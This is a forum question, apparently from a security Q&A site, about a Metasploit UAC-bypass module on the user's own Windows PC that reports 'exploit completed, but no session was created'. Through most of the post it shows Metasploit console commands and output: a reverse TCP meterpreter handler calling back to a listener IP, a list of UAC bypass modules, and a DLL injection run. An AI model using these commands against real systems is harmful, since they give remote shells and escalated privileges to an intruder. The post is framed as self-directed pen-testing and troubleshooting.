Exploit completed but no session was created

I was trying a pen-test on my PC by WSL and Kali and everything was fine until the payload was created and executed on my target PC, also getting a session back.

  • After the first step, I get:
    msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp
    msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set lhost 10.9.88.222 lhost => 10.9.88.222
    msf6 exploit(multi/handler) > set lport 8080 lport => 8080
    msf6 exploit(multi/handler) > start [-] Unknown command: start.
    msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.9.88.222:8080 [*] Sending stage (175174 bytes) to 10.9.0.1 [*] Meterpreter session 1 opened (10.9.88.222:8080 -> 10.9.0.1:54501) at 2021-01-07 13:08:04 +0530
    meterpreter >

  • However, the main problem occurs here; I tried to bypass the UAC and gain system-level privileges, trying 4 - 6 modules, got via a search result after executing search uac, and upon executing search uac, I get:
    meterpreter > background [*] Backgrounding session 1...
    msf6 exploit(multi/handler) > search uac
    Matching Modules
    ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/ask 2012-01-03 excellent No Windows Escalate UAC Execute RunAs 1 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass 2 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) 3 exploit/windows/local/bypassuac_dotnet_profiler 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via dot net profiler) 4 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) 5 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) 6 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) 7 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS 8 exploit/windows/local/bypassuac_sdclt 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key) 9 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup) 10 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) 11 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) 12 exploit/windows/local/bypassuac_windows_store_filesys 2019-08-22 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) 13 exploit/windows/local/bypassuac_windows_store_reg 2019-02-19 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry 14 post/windows/gather/win_privs normal No Windows Gather Privileges Enumeration 15 post/windows/manage/sticky_keys normal No Sticky Keys Persistance Module
    Interact with a module by name or index. For example info 15, use 15 or use post/windows/manage/sticky_keys

    I tried Module 7, receiving:
    msf6 exploit(multi/handler) > use 7 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > show targets Exploit targets: Id Name -- ---- 0 Windows x86 1 Windows x64
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > set target 1 target => 1
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > set session 1 session => 1
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LHOST 10.9.88.222 LHOST => 10.9.88.222
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LPORT 8080 LPORT => 8080
    msf6 exploit(windows/local/bypassuac_injection_winsxs) > run [*] Started reverse TCP handler on 10.9.88.222:8080 [+] Windows 10 (10.0 Build 18363). may be vulnerable. [*] UAC is Enabled, checking level... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Creating temporary folders... [*] Uploading the Payload DLL to the filesystem... [*] Spawning process with Windows Publisher Certificate, to inject into... [+] Successfully injected payload in to process: 9248 [*] Exploit completed, but no session was created.
    msf6 exploit(windows/local/bypassuac_injection_winsxs) >
    • Everything goes fine, but the session is not created, receiving:
      exploit completed but no session was created
    • I get this on running with verbose mode on
      [*] Started reverse TCP handler on 10.9.88.222:8080
      [+] Windows 10 (10.0 Build 18363). may be vulnerable.
      [*] UAC is Enabled, checking level...
      [*] Checking admin status...
      [+] Part of Administrators group! Continuing...
      [+] UAC is set to Default
      [+] BypassUAC can bypass this setting, continuing...
      [*] Creating temporary folders...
      [*] Uploading the Payload DLL to the filesystem...
      [*] Payload DLL 8704 bytes long being uploaded...
      [*] Spawning process with Windows Publisher Certificate, to inject into...
      [*] Injecting into process ID 10880
      [*] Opening process 10880
      [*] Injecting struct into 10880
      [*] Executing payload
      [+] Successfully injected payload in to process: 10880
      [*] Exploit completed, but no session was created.
    • I used Portmap.io to port forward (free plan), and have the latest versions of the Metasploit framework, WSL 2, and the Kali Linux app installed


How do I troubleshoot this?

4 Reset to default

Know someone who can answer? Share a link to this question via email, Twitter, or Facebook.

Your Answer

Sign up or log in

Sign up using Google Sign up using Facebook Sign up using Email and Password

Post as a guest

By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy

You Might Also Like